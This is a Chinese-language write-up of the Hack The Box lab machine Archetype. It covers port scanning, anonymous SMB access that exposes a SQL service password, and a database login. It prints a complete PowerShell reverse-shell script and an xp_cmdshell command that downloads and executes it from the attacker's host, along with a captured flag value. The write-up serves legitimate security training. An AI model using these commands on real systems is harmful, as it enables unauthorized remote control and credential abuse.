刚开始玩hack the box，需要了解一些东西

改善vpn连接的方法

---

第一个flag

首先用nmap扫描端口

 

 开放了135，139，445，1433四个端口

445，139：SMB协议端口，存在风险

1433:sql server端口

Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-20 20:27 CST
Nmap scan report for 10.10.10.27
Host is up (0.30s latency).
Not shown: 995 closed ports
PORT     STATE    SERVICE      VERSION
135/tcp  open     msrpc        Microsoft Windows RPC
139/tcp  open     netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open     microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open     ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: ARCHETYPE
|   NetBIOS_Domain_Name: ARCHETYPE
|   NetBIOS_Computer_Name: ARCHETYPE
|   DNS_Domain_Name: Archetype
|   DNS_Computer_Name: Archetype
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-09-20T12:47:39
|_Not valid after:  2051-09-20T12:47:39
|_ssl-date: 2021-09-20T12:53:19+00:00; +25m03s from scanner time.
1782/tcp filtered hp-hcip
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h49m04s, deviation: 3h07m52s, median: 25m02s
| ms-sql-info: 
|   10.10.10.27:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-09-20T05:53:08-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-09-20T12:53:04
|_  start_date: N/A

可以看见很多主机信息

 

利用445端口可以用smb工具匿名访问一下

smbclient -N -L 10.10.10.27

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    backups         Disk      
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available

smbclient用法汇总

其他三个都看不了，只能看backups

smbclient -N \\\\10.10.10.27\\backups                                   1 ⨯


Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jan 20 20:20:57 2020
  ..                                  D        0  Mon Jan 20 20:20:57 2020
  prod.dtsConfig                     AR      609  Mon Jan 20 20:23:02 2020

		10328063 blocks of size 4096. 8260445 blocks available

这个配置文件的信息里有一个id和密码

<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>

Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc

利用mssqlclient.py尝试连接数据库获得部分权限

python3 mssqlclient.py sql_svc@10.10.10.27 -windows-auth

成功连接，获得部分权限

当前用户是archetype\sql_svc 

---

一、【尝试】用cs看看能不能上线

尝试失败，dnslog都不通，怀疑是靶机问题

二、反弹shell

1.生成反弹shell脚本：

shell.ps1

$client = New-Object System.Net.Sockets.TCPClient("10.10.16.45",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data= (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

此处要修改为当前自己kali的ip地址

2.打开存放脚本的文件夹，用python建立服务

sudo python3 -m http.server 80

 监听刚刚设置的端口

sudo nc -lvnp 443 

3.用刚刚连接到的mssqlshell来反弹

EXEC xp_cmdshell 'echo IEX (New-Object Net.WebClient).DownloadString("http://10.10.16.45/shell.ps1") | powershell -noprofile'

成功反弹：

在桌面发现flag，user.txt

# cd desktop
# ls


    Directory: C:\Users\sql_svc\desktop


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-ar---        2/25/2020   6:37 AM             32 user.txt                                                              


# more user.txt
3e7b102e78218e935bf3f4951fec21a3

# ^C

 

---

第二个flag

需要获得administrator权限

 

通过命令历史记录查找到管理员密码，然后通过psexec.py来连接

获取普通用户权限后进一步研究如何获取管理员权限，从上面可知archetype\sql_svc具有三重用户身份：操作系统普通用户、数据库用户、数据库服务运行用户，此类用户通常在操作系统中具有超出其他普通用户的权限，比如执行高权限命令、访问特殊文件等，检查一下powershell的历史记录。

通过psexec.py来连接

在管理员的桌面找到flag

 

---

总结

1.思路：nmap信息搜集，可以利用的445端口，开了sql server 的服务，搜集主机相关信息，用泄漏的用户密码连接数据库服务，然后拿到这个mssqlshell，开始反弹shell，提权，拿到所有flag

2.Impacket使用

3.反弹shell步骤，生产代码

快速生成反弹shell

powercat

4.smb协议

https://blog.csdn.net/ZiXuanFY/article/details/52513512?utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-1.no_search_link&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7Edefault-1.no_search_link

打完第一关

标签：shell,20,HTB,Windows,wp,Server,sql,10.10,Archetype
来源： https://www.cnblogs.com/aeqaqstudy/p/15315873.html